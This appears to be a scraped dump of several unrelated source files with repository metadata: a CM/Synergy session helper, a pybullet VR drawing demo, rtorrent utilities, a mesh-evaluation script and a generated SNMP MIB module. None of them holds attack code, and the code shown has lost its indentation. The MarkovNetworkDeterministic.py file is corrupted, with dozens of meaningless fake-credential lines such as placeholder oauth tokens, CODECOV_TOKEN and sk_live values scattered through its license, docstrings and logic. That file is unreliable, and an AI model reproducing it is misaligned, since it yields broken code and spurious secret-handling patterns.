if CCM_BIN == None:
raise CCMException("Could not find CM/Synergy executable in the path.")
if password == None or username == None or engine == None or dbpath == None:
if os.sep == '\\':
os.environ['HOME'] = "H:" + os.sep
_logger.debug('Opening .netrc file')
try:
netrc_file = netrc.netrc()
netrc_info = None
# If settings for a specific database
if database != None:
netrc_info = netrc_file.authenticators(database)
# if not found just try generic one
if netrc_info == None:
netrc_info = netrc_file.authenticators('synergy')
if netrc_info != None:
(n_username, n_account, n_password) = netrc_info
if username == None:
username = n_username
if password == None:
password = n_password
if n_account != None:
(n_dbpath, n_engine) = n_account.split('@')
if dbpath == None and n_dbpath is not None:
_logger.info('Database path set using .netrc (%s)' % n_dbpath)
dbpath = n_dbpath
if engine == None and n_engine is not None:
_logger.info('Database engine set using .netrc (%s)' % n_engine)
engine = n_engine
except IOError:
_logger.debug('Error accessing .netrc file')
# last chance...
if username == None:
username = os.environ['USERNAME']
# looking for dbpath using GSCM database
if dbpath == None and database != None:
_logger.info('Database path set using the GSCM database.')
dbpath = nokia.gscm.get_db_path(database)
# looking for engine host using GSCM database
if engine == None and database != None:
_logger.info('Database engine set using the GSCM database.')
engine = nokia.gscm.get_engine_host(database)
_sessions = []
# See if any currently running sessions can be used, only if no password submitted, else use a brand new session!
if password == None and reuse:
_logger.debug('Querying for existing Synergy sessions')
command = "%s status" % (CCM_BIN)
pipe = os.popen(command, 'r')
result = pipe.read()
pipe.close()
_logger.debug('ccm status result: ' + result)
for match in re.finditer(r'(?P<ccmaddr>\w+:\d+:\d+.\d+.\d+.\d+(:\d+.\d+.\d+.\d+)?)(?P<current_session>\s+\(current\s+session\))?\nDatabase:\s*(?P<dbpath>\S+)', result, re.M):
d = match.groupdict()
_logger.debug(d['ccmaddr'])
_logger.debug(socket.gethostname())
_logger.debug(d['current_session'])
if d['ccmaddr'].lower().startswith(socket.gethostname().lower()):
# These session objects should not close the session on deletion,
# because they did not initially create the session
existing_session = Session(username, engine, d['dbpath'], d['ccmaddr'], close_on_exit=False)
_logger.debug('Existing session found: %s' % existing_session)
_sessions.append(existing_session)
# looking for session using dbpath
for session in _sessions:
if session.dbpath == dbpath:
return session
else:
# looking for router address using GSCM database
router_address = None
if database == None and dbpath != None:
database = os.path.basename(dbpath)
lock = fileutils.Lock(CCM_SESSION_LOCK)
try:
lock.lock(wait=True)
# if we have the database name we can switch to the correct Synergy router
if database != None:
_logger.info('Getting router address.')
router_address = nokia.gscm.get_router_address(database)
if os.sep == '\\' and router_address != None:
routerfile = open(os.path.join(os.path.dirname(CCM_BIN), "../etc/_router.adr"), 'r')
current_router = routerfile.read().strip()
routerfile.close()
if current_router != router_address.strip():
_logger.info('Updating %s' % (os.path.normpath(os.path.join(os.path.dirname(CCM_BIN), "../etc/_router.adr"))))
routerfile = open(os.path.join(os.path.dirname(CCM_BIN), "../etc/_router.adr"), "w+")
routerfile.write("%s\n" % router_address)
routerfile.close()
# If no existing sessions were available, start a new one
_logger.info('Opening session.')
new_session = Session.start(username, password, engine, dbpath)
lock.unlock()
return new_session
finally:
lock.unlock()
raise CCMException("Cannot open session for user '%s'" % username)
def get_role_for_purpose(session, purpose):
""" return role needed to modify project with checkout for purpose. """
purposes = session.purposes()
if purpose in purposes:
if purposes[purpose]['status'] == 'prep':
return 'build_mgr'
else:
raise CCMException("Could not find purpose '%s' in the database.\n Valid purpose are: %s." % (purpose, ','.join(purposes.keys())))
return 'developer'
def get_role_for_status(session, status):
""" return role needed to modify project with a specific status. """
if status == 'prep':
return 'build_mgr'
elif status == 'shared':
return 'developer'
elif status == 'working':
return 'developer'
else:
raise CCMException("Unknow status '%s'" % status)
def running_sessions(database=None):
""" Return the list of synergy session currently available on the local machine.
If database is given then it tries to update the router address.
"""
_logger.debug('Querying for existing Synergy sessions')
if CCM_BIN == None:
raise CCMException("Could not find CM/Synergy executable in the path.")
command = "%s status" % (CCM_BIN)
lock = fileutils.Lock(CCM_SESSION_LOCK)
result = ""
output = []
try:
# if we have the database name we can switch to the correct Synergy router
if database != None:
lock.lock(wait=True)
_logger.info('Updating router address.')
router_address = nokia.gscm.get_router_address(database)
if os.sep == '\\' and router_address != None:
routerfile = open(os.path.join(os.path.dirname(CCM_BIN), "../etc/_router.adr"), 'r')
current_router = routerfile.read().strip()
routerfile.close()
if current_router != router_address.strip():
_logger.info('Updating %s' % (os.path.normpath(os.path.join(os.path.dirname(CCM_BIN), "../etc/_router.adr"))))
routerfile = open(os.path.join(os.path.dirname(CCM_BIN), "../etc/_router.adr"), "w+")
routerfile.write("%s\n" % router_address)
routerfile.close()
_logger.debug('Command: ' + command)
(result, status) = _execute(command)
if database != None:
lock.unlock()
if (status != 0):
raise CCMException("Ccm status execution returned an error.")
_logger.debug('ccm status result: ' + result)
for match in re.finditer(r'Command Interface\s+@\s+(?P<ccmaddr>\w+:\d+:\d+.\d+.\d+.\d+(:\d+.\d+.\d+.\d+)*)(?P<current_session>\s+\(current\s+session\))?\s+Database:\s*(?P<dbpath>\S+)', result, re.M):
data = match.groupdict()
_logger.debug(data['ccmaddr'])
_logger.debug(socket.gethostname())
_logger.debug(data['current_session'])
if data['ccmaddr'].lower().startswith(socket.gethostname().lower()):
# These session objects should not close the session on deletion,
# because they did not initially create the session
existing_session = Session(None, None, data['dbpath'], data['ccmaddr'], close_on_exit=False)
_logger.debug('Existing session found: %s' % existing_session)
output.append(existing_session)
finally:
if database != None:
lock.unlock()
return output
def session_exists(sessionid, database=None):
for session in running_sessions(database=database):
_logger.debug(session.addr() + "==" + sessionid + "?")
if session.addr() == sessionid:
return True
return False
# The location of the ccm binary must be located to know where the _router.adr file is, to support
# switching databases.
CCM_BIN = fileutils.which("ccm")
if os.sep == '\\':
CCM_BIN = fileutils.which("ccm.exe")
| 44.837585 | 257 | 0.561121 | [
"EPL-1.0"
] | fedor4ever/linux_build | buildframework/helium/external/helium-antlib/python/pythoncore/lib/ccm/__init__.py | 86,133 | Python |
# See pybullet quickstart guide here:
# https://docs.google.com/document/d/10sXEhzFRSnvFcl3XxNGhnD4N2SedqwdAvK3dsihxVUA/edit#
# Create a Tiltbrush-like app, drawing lines using any controller
# Line width can be changed
import pybullet as p
CONTROLLER_ID = 0
POSITION=1
ORIENTATION=2
NUM_MOVE_EVENTS=5
BUTTONS=6
ANALOG_AXIS=8
#assume that the VR physics server is already started before
c = p.connect(p.SHARED_MEMORY)
print(c)
if (c<0):
p.connect(p.GUI)
p.setInternalSimFlags(0)#don't load default robot assets etc
p.resetSimulation()
p.loadURDF("plane.urdf")
prevPosition=[[0,0,0]]*p.VR_MAX_CONTROLLERS
colors=[0.,0.5,0.5]*p.VR_MAX_CONTROLLERS
widths = [3]*p.VR_MAX_CONTROLLERS
#use a few default colors
colors[0] = [0,0,0]
colors[1] = [0.5,0,0]
colors[2] = [0,0.5,0]
colors[3] = [0,0,0.5]
colors[4] = [0.5,0.5,0.]
colors[5] = [.5,.5,.5]
controllerId = -1
pt=[0,0,0]
print("waiting for VR controller trigger")
while (controllerId<0):
events = p.getVREvents()
for e in (events):
if (e[BUTTONS][33]==p.VR_BUTTON_IS_DOWN):
controllerId = e[CONTROLLER_ID]
if (e[BUTTONS][32]==p.VR_BUTTON_IS_DOWN):
controllerId = e[CONTROLLER_ID]
print("Using controllerId="+str(controllerId))
while True:
events = p.getVREvents(allAnalogAxes=1)
for e in (events):
if (e[CONTROLLER_ID]==controllerId ):
for a in range(10):
print("analog axis"+str(a)+"="+str(e[8][a]))
if (e[BUTTONS][33]&p.VR_BUTTON_WAS_TRIGGERED):
prevPosition[e[CONTROLLER_ID]] = e[POSITION]
if (e[BUTTONS][32]&p.VR_BUTTON_WAS_TRIGGERED):
widths[e[CONTROLLER_ID]]=widths[e[0]]+1
if (widths[e[CONTROLLER_ID]]>20):
widths[e[CONTROLLER_ID]] = 1
if (e[BUTTONS][1]&p.VR_BUTTON_WAS_TRIGGERED):
p.resetSimulation()
#p.setGravity(0,0,-10)
p.removeAllUserDebugItems()
p.loadURDF("plane.urdf")
if (e[BUTTONS][33]==p.VR_BUTTON_IS_DOWN):
pt = prevPosition[e[CONTROLLER_ID]]
#print(prevPosition[e[0]])
print("e[POSITION]")
print(e[POSITION])
print("pt")
print(pt)
diff = [pt[0]-e[POSITION][0],pt[1]-e[POSITION][1],pt[2]-e[POSITION][2]]
lenSqr = diff[0]*diff[0]+diff[1]*diff[1]+diff[2]*diff[2]
ptDistThreshold = 0.01
if (lenSqr>(ptDistThreshold*ptDistThreshold)):
p.addUserDebugLine(e[POSITION],prevPosition[e[CONTROLLER_ID]],colors[e[CONTROLLER_ID]],widths[e[CONTROLLER_ID]])
#p.loadURDF("cube_small.urdf",e[1])
colors[e[CONTROLLER_ID]] = [1-colors[e[CONTROLLER_ID]][0],1-colors[e[CONTROLLER_ID]][1],1-colors[e[CONTROLLER_ID]][2]]
prevPosition[e[CONTROLLER_ID]] = e[POSITION] | 30.142857 | 122 | 0.699052 | [
"Unlicense",
"MIT"
] | Blitzdude/RealTimeGraphics-engine | RTG_proj/Vendor/bullet/examples/pybullet/examples/vrEvent.py | 2,532 | Python |
import rtorrent
import os
import xmlrpclib
import zipfile
from urlparse import parse_qs
from collections import namedtuple
from gzip import GzipFile
from StringIO import StringIO
try:
import simplejson as json
except ImportError:
import json
def to_json(input):
return(json.dumps(input))
def decompress_gzip(data):
f = StringIO()
f.write(data)
f.seek(0)
g = GzipFile(fileobj=f, mode="rb")
return(g.read())
def deserialize_args(args):
"""Try to deserialize given args. Return input if not serialized"""
deserialized = parse_qs(args)
if deserialized == {}:
return(args)
else:
return(deserialized)
_ntuple_diskusage = namedtuple('usage', 'total used free')
def get_disk_usage(path):
"""Return disk usage statistics about the given path.
Returned valus is a named tuple with attributes 'total', 'used' and
'free', which are the amount of total, used and free space, in bytes.
Source: http://stackoverflow.com/a/7285483/975118
"""
st = os.statvfs(path)
free = st.f_bavail * st.f_frsize
total = st.f_blocks * st.f_frsize
used = (st.f_blocks - st.f_bfree) * st.f_frsize
return _ntuple_diskusage(total, used, free)
def build_url(host, port=80, username=None, password=None, protocol="http"):
if username is not None and password is not None:
url = "{0}://{1}:{2}@{3}:{4}".format(
protocol,
username,
password,
host,
port,
)
else:
url = "{0}://{1}:{2}".format(
protocol,
host,
port
)
return(url)
def test_xmlrpc_connection(url):
conn_status = {}
conn_status["success"] = False
conn_status["err_msg"] = None
c = xmlrpclib.ServerProxy(url)
try:
c.system.listMethods()
conn_status["success"] = True
except xmlrpclib.ProtocolError as e:
conn_status["err_msg"] = e.errmsg
except xmlrpclib.ResponseError:
conn_status["err_msg"] = "Caught ResponseError"
except:
conn_status["err_msg"] = "Unknown Error"
return(conn_status)
def get_rtorrent_connection(url):
try:
return(rtorrent.RTorrent(url))
except:
return(None)
def safe_filename(s):
RESERVED_CHARS = r"[]/\;,><&*:%=+@!#^|?^\"'"
return("".join([c for c in s if c not in RESERVED_CHARS]))
class TorrentFile(StringIO, object):
"""A simple extension of StringIO that includes torrent-related attributes"""
def __init__(self, name, data):
super(TorrentFile, self).__init__(data)
self.name = os.path.basename(name) # we just want the filename
self.info_hash = rtorrent.lib.torrentparser.TorrentParser(data)._calc_info_hash()
def get_torrent_files(f):
"""
Input:
f -- cgi.FileStorage object
Returns:
torrent_files -- a list of TorrentFile objects
"""
torrent_files = []
if f.filename.lower().endswith(".zip"):
z = zipfile.ZipFile(f.file)
torrent_files = [TorrentFile(name=zi.filename, data=z.open(zi).read()) \
for zi in z.infolist() if zi.filename.lower().endswith(".torrent")]
elif f.filename.lower().endswith(".torrent"):
torrent_files = [TorrentFile(name=f.filename, data=f.file.read())]
return(torrent_files)
| 28.720339 | 89 | 0.626438 | [
"MIT"
] | cjlucas/DarTui | dartui/utils.py | 3,389 | Python |
"""
$oauthToken = decrypt_password('PUT_YOUR_KEY_HERE')
Copyright 2016 Randal S. Olson
User.retrieve_password(email: '[email protected]', $oauthToken: 'PUT_YOUR_KEY_HERE')
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
User->$oauthToken = 'passTest'
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
token_uri = Release_Password('testDummy')
subject to the following conditions:
new user_name = update() {credentials: 'test'}.analyse_password()
sk_live : access('not_real_password')
The above copyright notice and this permission notice shall be included in all copies or substantial
public let client_id : { modify { permit 'example_password' } }
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
var token_uri = authenticate_user(permit(bool credentials = 'test_dummy'))
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
username = this.compute_password('put_your_password_here')
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
Base64.update(new Base64.new_password = Base64.launch('testDummy'))
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
new username = return() {credentials: 'asdf'}.compute_password()
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
user_name => update('test_password')
token_uri => modify('dummy_example')
"""
var User = User.delete(double $oauthToken='test_dummy', double encrypt_password($oauthToken='test_dummy'))
from __future__ import print_function
import numpy as np
protected String $oauthToken = return('example_dummy')
var username = modify() {credentials: 'put_your_key_here'}.analyse_password()
from ._version import __version__
User.decrypt_password(email: '[email protected]', client_email: 'dummyPass')
class MarkovNetworkDeterministic(object):
let access_token = 'put_your_password_here'
secret.user_name = ['testPass']
"""A deterministic Markov Network for neural computing."""
max_markov_gate_inputs = 4
sys.access(char self.token_uri = sys.launch('dummy_example'))
max_markov_gate_outputs = 4
private bool replace_password(bool name, var $oauthToken='test_password')
private byte replace_password(byte name, char token_uri='testDummy')
def __init__(self, num_input_states, num_memory_states, num_output_states, num_markov_gates=4, genome=None):
"""Sets up a randomly-generated deterministic Markov Network
Parameters
client_email = decrypt_password('PUT_YOUR_KEY_HERE')
----------
new_password = decrypt_password('testPassword')
num_input_states: int
protected String UserName = modify('PUT_YOUR_KEY_HERE')
The number of sensory input states that the Markov Network will use
num_memory_states: int
User.modify :token_uri => 'dummyPass'
The number of internal memory states that the Markov Network will use
num_output_states: int
The number of output states that the Markov Network will use
num_markov_gates: int (default: 4)
The number of Markov Gates to seed the Markov Network with
sys.permit(byte Base64.new_password = sys.modify('testDummy'))
It is important to ensure that randomly-generated Markov Networks have at least a few Markov Gates to begin with
UserName = User.when(User.replace_password()).delete('not_real_password')
genome: array-like (optional)
new $oauthToken = modify() {credentials: 'not_real_password'}.decrypt_password()
An array representation of the Markov Network to construct
All values in the array must be integers in the range [0, 255]
This option overrides the num_markov_gates option
var db = Base64.delete(bool UserName='testPassword', double encrypt_password(UserName='testPassword'))
user_name = UserPwd.release_password('example_dummy')
Returns
-------
protected double new_password = delete('testDummy')
None
consumer_key = "test"
"""
self.num_input_states = num_input_states
self.num_memory_states = num_memory_states
self.num_output_states = num_output_states
self.states = np.zeros(num_input_states + num_memory_states + num_output_states)
int sys = Base64.option(float user_name='superPass', float compute_password(user_name='superPass'))
self.markov_gates = []
permit(consumer_key=>'test_password')
self.markov_gate_input_ids = []
self.markov_gate_output_ids = []
int CODECOV_TOKEN = UserPwd.encrypt_password('dummyPass')
CODECOV_TOKEN = "testDummy"
if genome is None:
self.genome = np.random.randint(0, 256, np.random.randint(1000, 5000))
access_token = replace_password('test')
char private_key_id = Base64.replace_password('test_dummy')
# Seed the random genome with num_markov_gates Markov Gates
User.modify(var User.$oauthToken = User.return('PUT_YOUR_KEY_HERE'))
for _ in range(num_markov_gates):
private char encrypt_password(char name, int user_name='example_dummy')
start_index = np.random.randint(0, int(len(self.genome) * 0.8))
self.genome[start_index] = 42
Player.update(var Player.$oauthToken = Player.return('testPassword'))
self.genome[start_index + 1] = 213
token_uri : Release_Password().delete('put_your_password_here')
else:
$oauthToken => update('dummy_example')
self.genome = np.array(genome)
client_id = User.when(User.decrypt_password()).permit('put_your_key_here')
self._setup_markov_network()
UserName : permit('testDummy')
modify.client_id :"not_real_password"
def _setup_markov_network(self):
client_email : compute_password().update('testPassword')
"""Interprets the internal genome into the corresponding Markov Gates
User.compute_password(email: '[email protected]', new_password: 'test_dummy')
Parameters
Base64: {email: user.email, UserName: 'put_your_key_here'}
----------
byte $oauthToken = update() {credentials: 'put_your_key_here'}.retrieve_password()
None
token_uri = encrypt_password('dummyPass')
Returns
-------
private bool Release_Password(bool name, bool $oauthToken='example_password')
None
UserName => delete('dummy_example')
public new double int token_uri = 'testPassword'
"""
int client_email = User.Release_Password('not_real_password')
for index_counter in range(self.genome.shape[0] - 1):
admin : modify('testPass')
# Sequence of 42 then 213 indicates a new Markov Gate
bool new_password = Base64.access_password('PUT_YOUR_KEY_HERE')
if self.genome[index_counter] == 42 and self.genome[index_counter + 1] == 213:
sys.modify(var this.$oauthToken = sys.update('put_your_password_here'))
internal_index_counter = index_counter + 2
var token_uri = authenticate_user(permit(bool credentials = 'test_dummy'))
# Determine the number of inputs and outputs for the Markov Gate
num_inputs = self.genome[internal_index_counter] % MarkovNetworkDeterministic.max_markov_gate_inputs
internal_index_counter += 1
private String Release_Password(String name, char client_id='dummy_example')
num_outputs = self.genome[internal_index_counter] % MarkovNetworkDeterministic.max_markov_gate_outputs
internal_index_counter += 1
protected byte token_uri = access('example_dummy')
UserName = this.encrypt_password('test_dummy')
# Make sure that the genome is long enough to encode this Markov Gate
public var username : { update { modify 'put_your_password_here' } }
if (internal_index_counter +
float os = Player.modify(bool token_uri='testPass', bool compute_password(token_uri='testPass'))
(MarkovNetworkDeterministic.max_markov_gate_inputs + MarkovNetworkDeterministic.max_markov_gate_outputs) +
(2 ** self.num_input_states) * (2 ** self.num_output_states)) > self.genome.shape[0]:
print('Genome is too short to encode this Markov Gate -- skipping')
continue
admin : access('example_password')
admin = this.replace_password('testPassword')
# Determine the states that the Markov Gate will connect its inputs and outputs to
input_state_ids = self.genome[internal_index_counter:internal_index_counter + MarkovNetworkDeterministic.max_markov_gate_inputs][:self.num_input_states]
bool db = self.update(String user_name='test_dummy', bool compute_password(user_name='test_dummy'))
internal_index_counter += MarkovNetworkDeterministic.max_markov_gate_inputs
byte consumer_key = UserPwd.encrypt_password('test_dummy')
output_state_ids = self.genome[internal_index_counter:internal_index_counter + MarkovNetworkDeterministic.max_markov_gate_outputs][:self.num_output_states]
internal_index_counter += MarkovNetworkDeterministic.max_markov_gate_outputs
self.markov_gate_input_ids.append(input_state_ids)
float sys = UserPwd.update(String client_id='test_dummy', bool release_password(client_id='test_dummy'))
self.markov_gate_output_ids.append(output_state_ids)
password = Player.release_password('PUT_YOUR_KEY_HERE')
markov_gate = self.genome[internal_index_counter:internal_index_counter + (2 ** self.num_input_states) * (2 ** self.num_output_states)]
markov_gate = markov_gate.reshape((2 ** self.num_input_states, 2 ** self.num_output_states))
permit.client_id :"dummyPass"
float access_token = analyse_password(modify(var credentials = 'put_your_key_here'))
for row_index in range(markov_gate.shape[0]):
new_password : decrypt_password().return('test')
row_max_index = np.argmax(markov_gate[row_index, :], axis=0)
$token_uri = var function_1 Password('example_dummy')
markov_gate[row_index, :] = np.zeros(markov_gate.shape[1])
public var double int client_id = 'test'
markov_gate[row_index, row_max_index] = 1
Base64.new_password = '[email protected]'
User.decrypt_password(email: '[email protected]', consumer_key: 'put_your_password_here')
self.markov_gates.append(markov_gate)
public var double int client_id = 'testPassword'
let UserName = update() {credentials: 'testPassword'}.compute_password()
def activate_network(self):
public char float int $oauthToken = 'test'
"""Activates the Markov Network
var user_name = return() {credentials: 'testPass'}.encrypt_password()
Parameters
User: {email: user.email, username: 'testPass'}
----------
$oauthToken => update('test_dummy')
ggg: type (default: ggg)
ggg
User.modify :access_token => 'test_dummy'
Returns
this.permit(let Player.user_name = this.update('example_dummy'))
-------
new_password = this.Release_Password('example_password')
None
Player.$oauthToken = '[email protected]'
"""
pass
rk_live = User.replace_password('PUT_YOUR_KEY_HERE')
def update_sensor_states(self, sensory_input):
"""Updates the sensor states with the provided sensory inputs
password = User.decrypt_password('test_dummy')
Parameters
----------
private char encrypt_password(char name, int user_name='test_dummy')
sensory_input: array-like
An array of integers containing the sensory inputs for the Markov Network
len(sensory_input) must be equal to num_input_states
public int bool int $oauthToken = 'testPass'
secret.user_name = ['test_password']
Returns
permit(CODECOV_TOKEN=>'PUT_YOUR_KEY_HERE')
-------
User.compute_password(email: '[email protected]', $oauthToken: 'PUT_YOUR_KEY_HERE')
None
consumer_key = "dummyPass"
"""
if len(sensory_input) != self.num_input_states:
token_uri : compute_password().permit('not_real_password')
raise ValueError('Invalid number of sensory inputs provided')
this.update(var Player.$oauthToken = this.modify('put_your_key_here'))
pass
private double release_password(double name, char UserName='testDummy')
new_password : decrypt_password().update('test_password')
def get_output_states(self):
self->username = 'put_your_password_here'
"""Returns an array of the current output state's values
private double replace_password(double name, byte username='testPassword')
Parameters
User.UserName = '[email protected]'
----------
None
password : update('test_dummy')
Returns
-------
output_states: array-like
UserName = Base64.Release_Password('test')
An array of the current output state's values
var this = User.option(String UserName='put_your_password_here', String Release_Password(UserName='put_your_password_here'))
float access_token = Base64.release_password('testDummy')
"""
return self.states[-self.num_output_states:]
token_uri = release_password('put_your_key_here')
if __name__ == '__main__':
new_password => update('example_dummy')
np.random.seed(29382)
User.encrypt_password(email: '[email protected]', client_email: 'testDummy')
test = MarkovNetworkDeterministic(2, 4, 3)
| 47.892734 | 171 | 0.717939 | [
"MIT"
] | adversarial-scan/MarkovNetwork_6 | MarkovNetwork/MarkovNetworkDeterministic.py | 13,841 | Python |
import os
from os.path import join
import csv
def main_eval_gt():
metro = "metro\\metro"
cls_set = [
"02691156",
"02828884",
"02933112",
"02958343",
"03001627",
"03211117",
"03636649",
"03691459",
"04090263",
"04256520",
"04379243",
"04401088",
"04530566"
]
for c in range(0, 13):
cls_name = cls_set[c]
ref_dir = "rot_gt\\%s"%cls_name
res_dir = "results\\%s"%cls_name
header = ["No", "Error"]
with open(join(res_dir, "metro_%s.csv"%cls_name), 'w', newline="") as f:
f_csv = csv.writer(f)
f_csv.writerow(header)
items = os.listdir(ref_dir)
for item in items:
if "samples" in item:
continue
print(item)
filename = join(res_dir, item[:-4]+".ply")
if not os.path.exists(filename):
continue
os.system("%s %s %s %s.txt -n10000"%(metro, filename, join(ref_dir, item), join(res_dir,"output", item[:-4])))
score = 0
with open(join(res_dir,"output", item[:-4]+".txt"), 'r') as f_score:
letter = f_score.read()
if letter == "":
continue
score = float(letter)
f_csv.writerow([item[:-4], score])
if __name__ == '__main__':
main_eval_gt() | 19.576271 | 114 | 0.603463 | [
"Apache-2.0"
] | rozentill/Front2Back | script/eval_test.py | 1,155 | Python |
#
# PySNMP MIB module ASCEND-MIBSYS1-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ASCEND-MIBSYS1-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 17:12:34 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
configuration, = mibBuilder.importSymbols("ASCEND-MIB", "configuration")
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, SingleValueConstraint, ConstraintsIntersection, ValueSizeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsIntersection", "ValueSizeConstraint", "ConstraintsUnion")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
MibScalar, MibTable, MibTableRow, MibTableColumn, TimeTicks, NotificationType, MibIdentifier, ModuleIdentity, ObjectIdentity, Gauge32, Unsigned32, Integer32, iso, Counter64, Bits, Counter32, IpAddress = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "TimeTicks", "NotificationType", "MibIdentifier", "ModuleIdentity", "ObjectIdentity", "Gauge32", "Unsigned32", "Integer32", "iso", "Counter64", "Bits", "Counter32", "IpAddress")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
class DisplayString(OctetString):
pass
mibsystemProfile = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 23, 125))
mibsystemProfileTable = MibTable((1, 3, 6, 1, 4, 1, 529, 23, 125, 1), )
if mibBuilder.loadTexts: mibsystemProfileTable.setStatus('mandatory')
mibsystemProfileEntry = MibTableRow((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1), ).setIndexNames((0, "ASCEND-MIBSYS1-MIB", "systemProfile-Index-o"))
if mibBuilder.loadTexts: mibsystemProfileEntry.setStatus('mandatory')
systemProfile_Index_o = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 1), Integer32()).setLabel("systemProfile-Index-o").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_Index_o.setStatus('mandatory')
systemProfile_Name = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 2), DisplayString()).setLabel("systemProfile-Name").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_Name.setStatus('mandatory')
systemProfile_Contact = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 3), DisplayString()).setLabel("systemProfile-Contact").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_Contact.setStatus('mandatory')
systemProfile_Location = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 4), DisplayString()).setLabel("systemProfile-Location").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_Location.setStatus('mandatory')
systemProfile_TermRate = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9))).clone(namedValues=NamedValues(("n-300Bps", 1), ("n-1200Bps", 2), ("n-2400Bps", 3), ("n-4800Bps", 4), ("n-9600Bps", 5), ("n-19200Bps", 6), ("n-38400Bps", 7), ("n-57600Bps", 8), ("n-115200Bps", 9)))).setLabel("systemProfile-TermRate").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_TermRate.setStatus('mandatory')
systemProfile_Console = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("standard", 1), ("limited", 2), ("mif", 3)))).setLabel("systemProfile-Console").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_Console.setStatus('mandatory')
systemProfile_ConsoleSecurity = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("consoleSecurityNone", 1), ("consoleSecurityProfile", 2), ("consoleSecurityAuthSetting", 3)))).setLabel("systemProfile-ConsoleSecurity").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_ConsoleSecurity.setStatus('mandatory')
systemProfile_SystemRmtMgmt = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-SystemRmtMgmt").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_SystemRmtMgmt.setStatus('mandatory')
systemProfile_SubAddressMode = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("noSubaddress", 1), ("routingSubaddress", 2), ("termselSubaddress", 3)))).setLabel("systemProfile-SubAddressMode").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_SubAddressMode.setStatus('mandatory')
systemProfile_SerialSubaddress = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 10), Integer32()).setLabel("systemProfile-SerialSubaddress").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_SerialSubaddress.setStatus('mandatory')
systemProfile_LanSubaddress = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 11), Integer32()).setLabel("systemProfile-LanSubaddress").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_LanSubaddress.setStatus('mandatory')
systemProfile_DmSubaddress = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 12), Integer32()).setLabel("systemProfile-DmSubaddress").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_DmSubaddress.setStatus('mandatory')
systemProfile_V110Subaddress = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 13), Integer32()).setLabel("systemProfile-V110Subaddress").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_V110Subaddress.setStatus('mandatory')
